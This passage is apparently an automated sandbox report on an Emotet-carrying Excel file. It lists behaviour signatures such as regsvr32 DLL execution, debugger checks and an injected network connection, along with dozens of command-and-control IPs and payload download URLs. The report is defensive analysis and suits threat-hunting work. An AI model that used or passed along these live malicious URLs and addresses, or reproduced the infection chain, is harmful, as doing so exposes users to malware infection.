Source: C:\Windows\System32\regsvr32.exe API coverage: 5.5 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_00000001800427CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_00000001800427CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180042F88 FindFirstFileExW, 7_2_0000000180042F88
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180043464 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_0000000180043464
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C9F0 FindFirstFileW,FindNextFileW, 8_2_0214C9F0
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001360C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_000000018001360C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180048198 GetProcessHeap, 7_2_0000000180048198
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180002F14 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_0000000180002F14
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001360C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_000000018001360C

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 174.138.33.49 7080 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000000018004C150
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000000018004C1D4
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000000018004C2A4
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_000000018004C364
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 7_2_000000018004C5B0
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_0000000180046664
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_000000018004C708
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_0000000180046788
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 7_2_000000018004C7DC
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_0000000180046810
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_000000018004C908
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 7_2_00000001800475F0
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180059100 cpuid 7_2_0000000180059100
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800032C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_00000001800032C0

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 7.2.regsvr32.exe.1f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.1f40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2020000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1764450272.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1494028683.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1494505422.0000000002141000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 667161 Sample: Bericht 6581.xls Startdate: 17/07/2022 Architecture: WINDOWS Score: 100 39 103.224.241.74 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 2->39 41 202.29.239.162 UNINET-AS-APUNINET-TH Thailand 2->41 43 44 other IPs or domains 2->43 55 Snort IDS alert for network traffic 2->55 57 Multi AV Scanner detection for domain / URL 2->57 59 Antivirus detection for URL or domain 2->59 61 11 other signatures 2->61 8 EXCEL.EXE 9 24 2->8         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 45 atperson.com 51.38.169.114, 443, 49171 OVHFR France 8->45 47 domesticuif.co.za 196.22.142.203, 49176, 80 xneeloZA South Africa 8->47 49 2 other IPs or domains 8->49 29 C:\Users\user\soci4.ocx, PE32+ 8->29 dropped 31 C:\Users\user\...\I7IggNeBzEXeF5[1].dll, PE32+ 8->31 dropped 33 C:\Users\user\Desktop\Bericht 6581.xls, Composite 8->33 dropped 35 C:\Users\user\...\8WkzZvRZPr2gVDdMW[1].dll, data 8->35 dropped 63 Document exploit detected (creates forbidden files) 8->63 65 Document exploit detected (UrlDownloadToFile) 8->65 15 regsvr32.exe 2 8->15         started        19 regsvr32.exe 8->19         started        21 regsvr32.exe 8->21         started        23 regsvr32.exe 8->23         started        file6 signatures7 process8 file9 37 C:\Windows\...\gUYUkALTAiOgx.dll (copy), PE32+ 15->37 dropped 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->53 25 regsvr32.exe 2 15->25         started        signatures10 process11 dnsIp12 51 174.138.33.49, 49177, 7080 DIGITALOCEAN-ASNUS United States 25->51 67 System process connects to network (likely due to code injection or exploit) 25->67 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
157.230.99.206
 unknown United States
14061 DIGITALOCEAN-ASNUS true
188.165.79.151
 unknown France
16276 OVHFR true
196.44.98.190
 unknown Ghana
327814 EcobandGH true
174.138.33.49
 unknown United States
14061 DIGITALOCEAN-ASNUS true
43.129.209.178
 unknown Japan 4249 LILLY-ASUS true
103.41.204.169
 unknown Indonesia
58397 INFINYS-AS-IDPTInfinysSystemIndonesiaID true
36.67.23.59
 unknown Indonesia
17974 TELKOMNET-AS2-APPTTelekomunikasiIndonesiaID true
5.253.30.17
 unknown Latvia
18978 ENZUINC-US true
85.214.67.203
 unknown Germany
6724 STRATOSTRATOAGDE true
83.229.80.93
 unknown United Kingdom
8513 SKYVISIONGB true
198.199.70.22
 unknown United States
14061 DIGITALOCEAN-ASNUS true
93.104.209.107
 unknown Germany
8767 MNET-ASGermanyDE true
188.225.32.231
 unknown Russian Federation
9123 TIMEWEB-ASRU true
175.126.176.79
 unknown Korea Republic of
9523 MOKWON-AS-KRMokwonUniversityKR true
128.199.242.164
 unknown United Kingdom
14061 DIGITALOCEAN-ASNUS true
104.248.225.227
 unknown United States
14061 DIGITALOCEAN-ASNUS true
178.238.225.252
 unknown Germany
51167 CONTABODE true
190.145.8.4
 unknown Colombia
14080 TelmexColombiaSACO true
46.101.98.60
 unknown Netherlands
14061 DIGITALOCEAN-ASNUS true
44.194.33.146
 eliteturismo.com United States
14618 AMAZON-AESUS false
103.71.99.57
 unknown India
135682 AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdIN true
87.106.97.83
 unknown Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
103.85.95.4
 unknown Indonesia
136077 IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramID true
202.134.4.210
 unknown Indonesia
7713 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID true
88.217.172.165
 unknown Germany
8767 MNET-ASGermanyDE true
165.22.254.236
 unknown United States
14061 DIGITALOCEAN-ASNUS true
118.98.72.86
 unknown Indonesia
7713 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID true
139.59.80.108
 unknown Singapore
14061 DIGITALOCEAN-ASNUS true
37.44.244.177
 unknown Germany
47583 AS-HOSTINGERLT true
104.244.79.94
 unknown United States
53667 PONYNETUS true
157.245.111.0
 unknown United States
14061 DIGITALOCEAN-ASNUS true
54.37.106.167
 unknown France
16276 OVHFR true
202.29.239.162
 unknown Thailand
4621 UNINET-AS-APUNINET-TH true
103.56.149.105
 unknown Indonesia
55688 BEON-AS-IDPTBeonIntermediaID true
85.25.120.45
 unknown Germany
8972 GD-EMEA-DC-SXB1DE true
37.187.114.15
 unknown France
16276 OVHFR true
51.38.169.114
 atperson.com France
16276 OVHFR true
139.196.72.155
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd true
165.232.185.110
 unknown United States
22255 ALLEGHENYHEALTHNETWORKUS true
128.199.217.206
 unknown United Kingdom
14061 DIGITALOCEAN-ASNUS true
196.22.142.203
 domesticuif.co.za South Africa
37153 xneeloZA false
103.224.241.74
 unknown India
133296 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN true
210.57.209.142
 unknown Indonesia
38142 UNAIR-AS-IDUniversitasAirlanggaID true
190.107.19.179
 unknown Colombia
27951 MediaCommercePartnersSACO true
202.28.34.99
 unknown Thailand
9562 MSU-TH-APMahasarakhamUniversityTH true
54.37.228.122
 unknown France
16276 OVHFR true
195.77.239.39
 unknown Spain
60493 FICOSA-ASES true
185.15.196.157
 atici.net Turkey
201520 DEDICATEDTELECOMTR false
178.62.112.199
 unknown European Union
14061 DIGITALOCEAN-ASNUS true
62.171.178.147
 unknown United Kingdom
51167 CONTABODE true
64.227.55.231
 unknown United States
14061 DIGITALOCEAN-ASNUS true

Contacted Domains

Name IP Active
domesticuif.co.za 196.22.142.203 true
atperson.com 51.38.169.114 true
atici.net 185.15.196.157 true
eliteturismo.com 44.194.33.146 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://atperson.com/campusvirtual/EOgFGo17w/ true
  • Avira URL Cloud: malware
 unknown
http://domesticuif.co.za/libraries/nbnH9dpd/ false
    		high
    http://atici.net/c/JDFDBMIz/ true
    • Avira URL Cloud: malware
    		 unknown